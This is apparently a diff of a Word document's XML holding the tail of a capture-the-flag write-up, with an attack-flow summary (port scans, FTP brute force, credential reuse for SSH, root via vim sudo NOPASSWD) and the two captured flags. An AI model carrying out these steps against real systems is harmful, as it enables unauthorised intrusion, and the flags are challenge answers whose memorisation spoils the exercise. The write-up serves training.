+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Attack Flow Summary</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Scanned target → Found FTP &amp; HTTP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Discovered hidden directory → Found username</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Brute forced FTP → Found password</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Retrieved user flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Full port scan → Found hidden SSH</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Reused credentials → SSH access</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Checked sudo permissions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Exploited vim NOPASSWD</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Gained root access</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Retrieved root flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Final Flags</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>User Flag:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>ThunderCipher{ftp_to_ssh_owned_0x8917}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Root Flag:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>ThunderCipher{misconfigurations_dont_get_exploited_people_do}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="317BDA61" wp14:editId="4C030686">
+            <wp:extent cx="5731510" cy="2820670"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1260105716" name="Picture 42"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1260105716" name="Picture 1260105716"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2820670"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
@@ -8878,6 +10176,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4EED2026"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="D74893F0"/>
+    <w:lvl w:ilvl="0" w:tplc="40090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5FBE41A4"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FBDE2A86"/>
@@ -8990,7 +10401,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="606127D9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F1AAAF44"/>
@@ -9103,7 +10514,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="633D6A10"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="77A8F946"/>
@@ -9216,7 +10627,93 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="63D93B81"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9468BCA4"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6528033F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6E5078F4"/>
@@ -9329,7 +10826,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66A34EC7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BF06E780"/>
@@ -9442,7 +10939,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6E3C4CE5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9B14D5A2"/>
@@ -9555,7 +11052,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="77B10559"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="95C89586"/>
@@ -9668,7 +11165,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="78A8273A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="64C68D26"/>
@@ -9781,7 +11278,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7B1B111D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="66FC38B6"/>
@@ -9895,16 +11392,16 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="356734183">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1919703842">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="854657234">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="75059167">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1055350748">
     <w:abstractNumId w:val="13"/>
@@ -9913,19 +11410,19 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="180512877">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1339381322">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="1406992489">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1468862676">
     <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="1489515906">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="1590626527">
     <w:abstractNumId w:val="4"/>
@@ -9961,19 +11458,25 @@
     <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="23" w16cid:durableId="127431437">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="24" w16cid:durableId="1361736950">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="25" w16cid:durableId="577136631">
     <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="26" w16cid:durableId="391393925">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="27" w16cid:durableId="1420642320">
     <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="28" w16cid:durableId="1185250454">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="29" w16cid:durableId="36243098">
+    <w:abstractNumId w:val="22"/>
   </w:num>
 </w:numbering>
 </file>
@@ -11280,7 +12783,7 @@
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
 <CoverPageProperties xmlns="http://schemas.microsoft.com/office/2006/coverPageProps">
-  <PublishDate>2026-02-26T00:00:00</PublishDate>
+  <PublishDate>2026-03-02T00:00:00</PublishDate>
   <Abstract/>
   <CompanyAddress/>
   <CompanyPhone/>

--- a/Doc1.docx
+++ b/Doc1.docx
@@ -156,7 +156,7 @@
                                     <w:tag w:val=""/>
                                     <w:id w:val="-650599894"/>
                                     <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                                    <w:date w:fullDate="2026-03-10T00:00:00Z">
+                                    <w:date w:fullDate="2026-03-16T00:00:00Z">
                                       <w:dateFormat w:val="M/d/yyyy"/>
                                       <w:lid w:val="en-US"/>
                                       <w:storeMappedDataAs w:val="dateTime"/>
@@ -180,7 +180,7 @@
                                           <w:sz w:val="28"/>
                                           <w:szCs w:val="28"/>
                                         </w:rPr>
-                                        <w:t>3/10/2026</w:t>
+                                        <w:t>3/16/2026</w:t>
                                       </w:r>
                                     </w:p>
                                   </w:sdtContent>
@@ -3468,7 +3468,7 @@
                               <w:tag w:val=""/>
                               <w:id w:val="-650599894"/>
                               <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                              <w:date w:fullDate="2026-03-10T00:00:00Z">
+                              <w:date w:fullDate="2026-03-16T00:00:00Z">
                                 <w:dateFormat w:val="M/d/yyyy"/>
